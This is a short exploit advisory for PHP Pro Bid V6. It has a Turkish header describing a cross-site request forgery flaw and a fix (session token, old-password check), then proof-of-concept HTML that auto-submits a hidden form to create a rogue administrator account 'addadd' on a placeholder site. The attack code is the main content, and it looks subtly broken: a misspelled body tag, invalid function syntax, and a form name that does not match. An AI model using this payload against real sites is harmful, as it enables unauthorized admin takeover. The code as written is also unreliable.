< ------------------- header data start ------------------- >

#############################################################

# Application Name : PHP Pro Bid V6

# Vulnerable Type : XSRF

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/BizaRRo

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<b0dy onLoad=Submit();>
<script>function Submit[]{document.BizaRRo.submit();}</script>

<form action=http://www.SITE.com/[PATCH]/admin/list_admin_users.php method=post name=form_admin_user>
<input type=hidden name=do value=add_user />
<input type=hidden name=id value= />
<input type=hidden name=operation value=submit />

<input type=hidden name=username value=addadd size=50 />
<input type=hidden name=password value=addadd size=35 />
<input type=hidden name=password2 value=addadd size=35 />
<select name=level><option value=1 selected></select>
<input type=submit value=create name=B1>


< -- bug code end of -- >